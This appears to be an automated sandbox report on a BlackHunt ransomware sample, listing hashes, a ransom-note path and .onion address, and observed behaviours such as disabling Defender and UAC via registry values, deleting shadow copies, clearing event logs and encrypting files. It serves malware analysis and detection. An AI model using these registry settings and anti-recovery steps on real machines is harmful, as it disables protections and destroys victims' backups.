Analysis
-
max time kernel
92s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:31
Static task
static1
Behavioral task
behavioral1
Sample
5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe
Resource
win10v2004-20231215-en
General
-
Target
5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe
-
Size
707KB
-
MD5
fe55796f94ef98bb1adc30ec3bcd2736
-
SHA1
048a62583b5c36c7942998b075b89bf2ab1d5025
-
SHA256
5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f
-
SHA512
ba5f6806709cded864751f62b20999f6c37f5be6861ed673144f2a241d2d0f1ca7ceaa68a2643db17eacfec351835c516600b2cdecba47295717b9b38298d18d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1b8gvnh:6uaTmkZJ+naie5OTamgEoKxLWC+h
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 8208 fsutil.exe 15120 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 9732 wevtutil.exe 9716 wevtutil.exe 13188 wevtutil.exe 10352 wevtutil.exe 10420 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 7672 bcdedit.exe 10940 bcdedit.exe 10096 bcdedit.exe 3084 bcdedit.exe -
Renames multiple (3383) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 9112 wbadmin.exe 13088 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Key value queried \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\International\Geo\Nation cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\T: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\H: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\N: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\E: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\U: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\A: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\G: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\L: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\Z: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\B: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\K: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\V: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\M: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\I: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\J: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\Q: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\R: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\Y: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\P: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\S: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened (read-only) \??\X: 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 3 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\locale\br\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\plugins\d3d11\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ca-es\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\vlc.mo 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\fi-fi\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\locale\th\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\AddressBook.png 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\zh-tw\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\icons_ie8.gif 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ro-ro\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_listview_18.svg 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_move_18.svg 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\es-es\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\xmlresolver.md 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\Java\jre-1.8\lib\fonts\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\Java\jre-1.8\lib\applet\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files\VideoLAN\VLC\New_Skins.url 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\css\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main.css 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_de_135x40.svg 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-ae\ui-strings.js 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\ui-strings.js 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\pl_get.svg 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\Java\jre-1.8\lib\deploy\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-gb\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\en-il\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\fi-fi\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\vlc.mo 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ro-ro\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\meta-index 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\css\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook.png 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\#BlackHunt_ReadMe.txt 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files-select\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\pl-pl\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\nl-nl\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\sl-si\#BlackHunt_ReadMe.hta 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\remove.svg 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_newfolder_18.svg 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\root\#BlackHunt_Private.key 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9960 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 7832 vssadmin.exe 7372 vssadmin.exe 10496 vssadmin.exe 11224 vssadmin.exe 11204 vssadmin.exe 7616 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 5892 taskkill.exe -
Modifies registry class 9 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-768304381-2824894965-3840216961-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 10844 PING.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Token: SeRestorePrivilege 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Token: SeBackupPrivilege 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Token: SeTakeOwnershipPrivilege 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Token: SeAuditPrivilege 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Token: SeSecurityPrivilege 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Token: SeIncBasePriorityPrivilege 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe Token: SeBackupPrivilege 8144 vssvc.exe Token: SeRestorePrivilege 8144 vssvc.exe Token: SeAuditPrivilege 8144 vssvc.exe Token: SeBackupPrivilege 10476 wbengine.exe Token: SeRestorePrivilege 10476 wbengine.exe Token: SeSecurityPrivilege 10476 wbengine.exe Token: SeSecurityPrivilege 10420 wevtutil.exe Token: SeBackupPrivilege 10420 wevtutil.exe Token: SeSecurityPrivilege 9732 wevtutil.exe Token: SeBackupPrivilege 9732 wevtutil.exe Token: SeSecurityPrivilege 9716 wevtutil.exe Token: SeBackupPrivilege 9716 wevtutil.exe Token: SeSecurityPrivilege 13188 wevtutil.exe Token: SeBackupPrivilege 13188 wevtutil.exe Token: SeSecurityPrivilege 10352 wevtutil.exe Token: SeBackupPrivilege 10352 wevtutil.exe Token: SeDebugPrivilege 5892 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1520 wrote to memory of 2096 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 89 PID 1520 wrote to memory of 2096 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 89 PID 1520 wrote to memory of 228 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 91 PID 1520 wrote to memory of 228 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 91 PID 1520 wrote to memory of 5012 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 93 PID 1520 wrote to memory of 5012 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 93 PID 1520 wrote to memory of 760 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 187 PID 1520 wrote to memory of 760 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 187 PID 2096 wrote to memory of 5036 2096 cmd.exe 96 PID 2096 wrote to memory of 5036 2096 cmd.exe 96 PID 1520 wrote to memory of 5000 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 98 PID 1520 wrote to memory of 5000 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 98 PID 1520 wrote to memory of 3836 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 100 PID 1520 wrote to memory of 3836 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 100 PID 1520 wrote to memory of 640 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 106 PID 1520 wrote to memory of 640 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 106 PID 1520 wrote to memory of 736 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 104 PID 1520 wrote to memory of 736 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 104 PID 1520 wrote to memory of 1848 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 101 PID 1520 wrote to memory of 1848 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 101 PID 1520 wrote to memory of 3004 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 107 PID 1520 wrote to memory of 3004 1520 5e9e1ffec918108b2c3bcbe7729f926b191c21154cc4aa5b1187e2f6ea6de82f.exe 107 PID 1520 wrote to memory of 4592 1520 